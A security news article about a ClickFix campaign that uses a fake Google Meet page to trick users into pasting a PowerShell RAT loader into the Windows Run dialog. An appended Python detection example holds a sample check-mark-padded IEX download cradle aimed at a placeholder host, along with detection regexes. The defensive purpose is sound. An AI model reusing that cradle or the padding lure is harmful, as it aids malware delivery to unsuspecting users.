A new, highly sophisticated malware campaign has been identified targeting remote workers and organizations through a fake Google Meet landing page.
Hosted on the deceptive domain gogl-meet[.]com, this attack leverages the “ClickFix” social engineering technique to bypass traditional browser security controls and deliver a Remote Access Trojan (RAT) directly to the victim’s system.
The attack begins when a user navigates to the fraudulent site, which is visually indistinguishable from the legitimate Google Meet interface. Instead of a video feed, the user is interrupted by a pop-up error message, typically claiming a camera or microphone issue titled “Can’t join the meeting.”
Unlike standard phishing that asks for credentials, this page offers a technical “fix” that requires physical user interaction. The prompt instructs the victim to perform a specific sequence of keystrokes: Press the Windows key + R, then CTRL + V, and finally Enter.
Unbeknownst to the user, clicking the “Join now” or “Fix” button on the page triggers a JavaScript function that copies a malicious PowerShell script to their clipboard.
By following the manual keystroke instructions, the user unwittingly pastes and executes this script via the Windows Run dialog, effectively bypassing browser-based security filters such as Google Safe Browsing and SmartScreen.
Forensic Analysis and Indicators
Recent incident response activities involving gogl-meet[.]com have confirmed that this chain leads to a RAT infection. Forensic analysis of affected systems identified the infection’s root cause through the Master File Table (MFT).
Specifically, the MFT entry for the dropped payload carried critical origin data in its Alternate Data Stream (ADS), recording both the file downloaded by the ClickFix page and the referrer URL gogl-meet[.]com.
This forensic artifact is crucial for defenders, as it definitively links the execution of the RAT back to the browser-based social engineering event rather than a typical drive-by download or email attachment.
A distinct characteristic of this wave is the obfuscation used within the PowerShell payload itself. Threat actors have begun padding the malicious script with extensive comments containing trusted visual symbols, such as repeated green check marks (✅).
When a user pastes the content into the small Windows Run box, these symbols may be the only visible text, visually reassuring the victim that the command is “verified” or safe.
This tactic also serves a technical purpose: it can push the actual malicious code (often an IEX download cradle) out of the immediate visible area of the dialog box, masking the script’s true intent.
While ClickFix (also associated with clusters like ClearFake) gained significant traction throughout 2024, this latest iteration demonstrates a shift toward hyper-targeted branding.
Early campaigns impersonated generic browser updates or Word errors; the shift to a Google Meet simulation suggests a pivot toward corporate environments, where video-conferencing glitches are a common and trusted source of friction.
Security teams are advised to update detection rules to flag PowerShell execution strings originating from the Run dialog that contain unusual Unicode characters or extensive comment blocks, which are tell-tale signs of manual execution.
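As an added example (not code from the article or from any vendor tooling), the two detection points above in Python: scoring a Run-dialog PowerShell command line for symbol padding, comment bulk and an IEX download cradle, and pulling the referrer host out of the Zone.Identifier ADS that Windows writes for browser downloads. The sample records, the explorer.exe parent heuristic and the 30% comment threshold are assumptions.

```python
import re
import unicodedata
from urllib.parse import urlparse

# Constructed process-creation record in the shape a Sysmon Event ID 1 or
# Security 4688 collector would emit; the payload URL is a placeholder.
CLICKFIX_CMD = (
    'powershell.exe -NoP -w hidden -c "'
    "# \u2705\u2705\u2705\u2705\u2705\u2705 Google Meet camera fix \u2705\u2705\u2705\u2705\u2705\u2705\n"
    "# \u2705\u2705\u2705\u2705\u2705\u2705 Verified safe, press Enter \u2705\u2705\u2705\u2705\u2705\u2705\n"
    "IEX (New-Object Net.WebClient).DownloadString('http://PAYLOAD-PLACEHOLDER.invalid/m')\""
)
BENIGN_CMD = 'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending"'

COMMENT_RE = re.compile(r"<#.*?#>|#[^\r\n]*", re.S)
IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
DOWNLOAD_RE = re.compile(r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|irm|invoke-restmethod)\b", re.I)

def score_run_dialog_cmd(cmdline, parent_image):
    """Return the ClickFix indicators found in one process-creation record."""
    reasons = []
    # Win+R launches are children of explorer.exe; scheduled or console scripts are not.
    if parent_image.lower().endswith("\\explorer.exe"):
        reasons.append("launched via Run dialog (parent explorer.exe)")
    # Emoji and dingbats are Unicode category "So"; real commands never need them.
    symbols = sum(1 for c in cmdline if unicodedata.category(c) == "So")
    if symbols:
        reasons.append(f"{symbols} decorative Unicode symbols")
    # Padding: comments that make up a large share of the pasted text.
    commented = sum(len(m.group(0)) for m in COMMENT_RE.finditer(cmdline))
    if commented / max(len(cmdline), 1) > 0.3:
        reasons.append("comment padding exceeds 30% of command")
    if IEX_RE.search(cmdline) and DOWNLOAD_RE.search(cmdline):
        reasons.append("IEX download cradle")
    return reasons

# Constructed Zone.Identifier stream, the ADS that records a browser download's
# origin; a live stream carries the undefanged referrer URL.
ZONE_SAMPLE = ("[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://gogl-meet[.]com/\r\n"
               "HostUrl=https://PAYLOAD-PLACEHOLDER.invalid/m\r\n")
WATCHLIST = {"gogl-meet.com"}

def referrer_on_watchlist(zone_stream):
    """Parse the key=value lines of the ADS and return the referrer host if it is listed."""
    fields = dict(line.split("=", 1) for line in zone_stream.splitlines() if "=" in line)
    url = fields.get("ReferrerUrl", "").replace("[.]", ".")
    host = urlparse(url).hostname
    return host if host in WATCHLIST else None
```

On a live host the stream is read with Get-Content -Stream Zone.Identifier; the score function is meant to run over the command lines your SIEM already collects.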
The post Beware of Weaponized Google Meet page that uses ClickFix to Deliver Malicious Payload appeared first on Cyber Security News.